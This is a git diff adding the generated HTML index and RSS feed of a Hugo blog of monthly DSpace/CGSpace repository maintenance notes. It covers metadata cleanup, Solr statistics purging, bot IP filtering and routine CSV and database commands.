+<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li>
+</ul>
+</li>
+<li>I spent some time updating the authorizations in Alliance collections
+<ul>
+<li>I want to make sure they use groups instead of individuals where possible!</li>
+</ul>
+</li>
+<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-10/">October, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-10-01T19:45:36+03:00">Sat Oct 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-10-01">2022-10-01</h2>
+<ul>
+<li>Start a harvest on AReS last night</li>
+<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests
+<ul>
+<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li>
+<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/2/" rel="next" role="button">Next page</a>
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/index.xml b/docs/posts/index.xml
new file mode 100644
index 000000000..5f4165c24
--- /dev/null
+++ b/docs/posts/index.xml
@@ -0,0 +1,1907 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Posts on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/posts/</link>
+    <description>Recent content in Posts on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sat, 01 Jul 2023 17:14:36 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/posts/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>July, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-07/</link>
+      <pubDate>Sat, 01 Jul 2023 17:14:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-07/</guid>
+      <description>2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &amp;ldquo;Copyrighted; all rights reserved&amp;rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&amp;rsquo;s usually copyrighted (could still be open access, but we can&amp;rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&amp;hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&amp;rsquo;t like the Impact Area icons as a component because they don&amp;rsquo;t have any visual meaning </description>
+    </item>
+    
+    <item>
+      <title>June, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-06/</link>
+      <pubDate>Fri, 02 Jun 2023 10:29:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-06/</guid>
+      <description>&lt;h2 id=&#34;2023-06-02&#34;&gt;2023-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Spend some time testing my &lt;code&gt;post_bitstreams.py&lt;/code&gt; script to update thumbnails for items on CGSpace
+&lt;ul&gt;
+&lt;li&gt;Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+&lt;ul&gt;
+&lt;li&gt;They have experience with improving the MODS interface in MELSpace&amp;rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace&lt;/li&gt;
+&lt;li&gt;From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-05/</link>
+      <pubDate>Wed, 03 May 2023 08:53:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-05/</guid>
+      <description>&lt;h2 id=&#34;2023-05-03&#34;&gt;2023-05-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Alliance&amp;rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+&lt;ul&gt;
+&lt;li&gt;It seems their password expired, which is annoying&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+&lt;ul&gt;
+&lt;li&gt;There are many of our subjects that would match if they added a &amp;ldquo;-&amp;rdquo; like &amp;ldquo;high yielding varieties&amp;rdquo; or used singular&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also I found at least two spelling mistakes, for example &amp;ldquo;decison support systems&amp;rdquo;, which would match if it was spelled correctly&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-04/</link>
+      <pubDate>Sun, 02 Apr 2023 08:19:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-04/</guid>
+      <description>&lt;h2 id=&#34;2023-04-02&#34;&gt;2023-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run all system updates on CGSpace and reboot it&lt;/li&gt;
+&lt;li&gt;I exported CGSpace to CSV to check for any missing Initiative collection mappings
+&lt;ul&gt;
+&lt;li&gt;I also did a check for missing country/region mappings with csv-metadata-quality&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start a harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-03/</link>
+      <pubDate>Wed, 01 Mar 2023 07:58:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-03/</guid>
+      <description>&lt;h2 id=&#34;2023-03-01&#34;&gt;2023-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove &lt;code&gt;cg.subject.wle&lt;/code&gt; and &lt;code&gt;cg.identifier.wletheme&lt;/code&gt; from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28&#34;&gt;iso-codes 4.13.0 was released&lt;/a&gt;, which incorporates my changes to the common names for Iran, Laos, and Syria&lt;/li&gt;
+&lt;li&gt;I finally got through with porting the input form from DSpace 6 to DSpace 7&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-02/</link>
+      <pubDate>Wed, 01 Feb 2023 10:57:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-02/</guid>
+      <description>&lt;h2 id=&#34;2023-02-01&#34;&gt;2023-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export CGSpace to cross check the DOI metadata with Crossref
+&lt;ul&gt;
+&lt;li&gt;I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-01/</link>
+      <pubDate>Sun, 01 Jan 2023 08:44:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-01/</guid>
+      <description>&lt;h2 id=&#34;2023-01-01&#34;&gt;2023-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Apply some more ORCID identifiers to items on CGSpace using my &lt;code&gt;2022-09-22-add-orcids.csv&lt;/code&gt; file
+&lt;ul&gt;
+&lt;li&gt;I want to update all ORCID names and refresh them in the database&lt;/li&gt;
+&lt;li&gt;I see we have some new ones that aren&amp;rsquo;t in our list if I combine with this file:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-12/</link>
+      <pubDate>Thu, 01 Dec 2022 08:52:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-12/</guid>
+      <description>&lt;h2 id=&#34;2022-12-01&#34;&gt;2022-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Fix some incorrect regions on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!&lt;/li&gt;
+&lt;li&gt;Replace &amp;ldquo;East Asia&amp;rdquo; with &amp;ldquo;Eastern Asia&amp;rdquo; region on CGSpace (UN M.49 region)&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-11/</link>
+      <pubDate>Tue, 01 Nov 2022 09:11:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-11/</guid>
+      <description>&lt;h2 id=&#34;2022-11-01&#34;&gt;2022-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Last night I re-synced DSpace 7 Test from CGSpace
+&lt;ul&gt;
+&lt;li&gt;I also updated all my local &lt;code&gt;7_x-dev&lt;/code&gt; branches on the latest upstreams&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I spent some time updating the authorizations in Alliance collections
+&lt;ul&gt;
+&lt;li&gt;I want to make sure they use groups instead of individuals where possible!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&amp;rsquo;t upload CSVs from the web interface and is a very low severity security issue&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-10/</link>
+      <pubDate>Sat, 01 Oct 2022 19:45:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-10/</guid>
+      <description>&lt;h2 id=&#34;2022-10-01&#34;&gt;2022-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a harvest on AReS last night&lt;/li&gt;
+&lt;li&gt;Yesterday I realized how to use &lt;a href=&#34;https://im4java.sourceforge.net/docs/dev-guide.html&#34;&gt;GraphicsMagick with im4java&lt;/a&gt; and I want to re-visit some of my thumbnail tests
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8&lt;/li&gt;
+&lt;li&gt;I filed &lt;a href=&#34;https://github.com/criteo/JVips/issues/141&#34;&gt;an issue to ask about Java 11+ support&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-09/</link>
+      <pubDate>Thu, 01 Sep 2022 09:41:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-09/</guid>
+      <description>&lt;h2 id=&#34;2022-09-01&#34;&gt;2022-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A bit of work on the &amp;ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&amp;rdquo; spreadsheet&lt;/li&gt;
+&lt;li&gt;I tested an item submission on DSpace Test with the Cocoon &lt;code&gt;org.apache.cocoon.uploads.autosave=false&lt;/code&gt; change
+&lt;ul&gt;
+&lt;li&gt;The submission works as expected&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start debugging some region-related issues with csv-metadata-quality
+&lt;ul&gt;
+&lt;li&gt;I created a new test file &lt;code&gt;test-geography.csv&lt;/code&gt; with some different scenarios&lt;/li&gt;
+&lt;li&gt;I also fixed a few bugs and improved the region-matching logic&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-08/</link>
+      <pubDate>Mon, 01 Aug 2022 10:22:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-08/</guid>
+      <description>&lt;h2 id=&#34;2022-08-01&#34;&gt;2022-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Our request to add &lt;a href=&#34;https://github.com/spdx/license-list-XML/issues/1525&#34;&gt;CC-BY-3.0-IGO to SPDX&lt;/a&gt; was approved a few weeks ago&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-07/</link>
+      <pubDate>Sat, 02 Jul 2022 14:07:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-07/</guid>
+      <description>&lt;h2 id=&#34;2022-07-02&#34;&gt;2022-07-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I learned how to use the Levenshtein functions in PostgreSQL
+&lt;ul&gt;
+&lt;li&gt;The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing&lt;/li&gt;
+&lt;li&gt;Also, the trgm functions I&amp;rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-06/</link>
+      <pubDate>Mon, 06 Jun 2022 09:01:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-06/</guid>
+      <description>&lt;h2 id=&#34;2022-06-06&#34;&gt;2022-06-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at the Solr statistics on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &amp;ldquo;msnbot-&amp;rdquo; using the Solr query &lt;code&gt;dns:*msnbot* AND dns:*.msn.com&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;I purged these first so I could see the other &amp;ldquo;real&amp;rdquo; IPs in the Solr facets&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+&lt;ul&gt;
+&lt;li&gt;There seem to be many more of these:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-05/</link>
+      <pubDate>Wed, 04 May 2022 09:13:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-05/</guid>
+      <description>&lt;h2 id=&#34;2022-05-04&#34;&gt;2022-05-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+&lt;ul&gt;
+&lt;li&gt;18.207.136.176&lt;/li&gt;
+&lt;li&gt;185.189.36.248&lt;/li&gt;
+&lt;li&gt;50.118.223.78&lt;/li&gt;
+&lt;li&gt;52.70.76.123&lt;/li&gt;
+&lt;li&gt;3.236.10.11&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking at the Solr statistics for 2022-04
+&lt;ul&gt;
+&lt;li&gt;52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests&lt;/li&gt;
+&lt;li&gt;64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc&lt;/li&gt;
+&lt;li&gt;185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt&lt;/li&gt;
+&lt;li&gt;157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;If I query Solr for &lt;code&gt;time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.&lt;/code&gt; I see a handful of IPs that made 41,000 requests&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I purged 93,974 hits from these IPs using my &lt;code&gt;check-spider-ip-hits.sh&lt;/code&gt; script&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
+      <pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
+      <description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
+    </item>
+    
+    <item>
+      <title>March, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
+      <pubDate>Tue, 01 Mar 2022 16:46:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
+      <description>&lt;h2 id=&#34;2022-03-01&#34;&gt;2022-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-02/</link>
+      <pubDate>Tue, 01 Feb 2022 14:06:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-02/</guid>
+      <description>&lt;h2 id=&#34;2022-02-01&#34;&gt;2022-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with Peter and Abenet about CGSpace in the One CGIAR
+&lt;ul&gt;
+&lt;li&gt;We agreed to buy $5,000 worth of credits from Atmire for future upgrades&lt;/li&gt;
+&lt;li&gt;We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization&lt;/li&gt;
+&lt;li&gt;We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one&lt;/li&gt;
+&lt;li&gt;We agreed to try to do more alignment of affiliations/funders with ROR&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-01/</link>
+      <pubDate>Sat, 01 Jan 2022 15:20:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-01/</guid>
+      <description>&lt;h2 id=&#34;2022-01-01&#34;&gt;2022-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a full harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-12/</link>
+      <pubDate>Wed, 01 Dec 2021 16:07:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-12/</guid>
+      <description>&lt;h2 id=&#34;2021-12-01&#34;&gt;2021-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
+&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-11/</link>
+      <pubDate>Tue, 02 Nov 2021 22:27:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-11/</guid>
+      <description>&lt;h2 id=&#34;2021-11-02&#34;&gt;2021-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
+&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-10/</link>
+      <pubDate>Fri, 01 Oct 2021 11:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-10/</guid>
+      <description>&lt;h2 id=&#34;2021-10-01&#34;&gt;2021-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
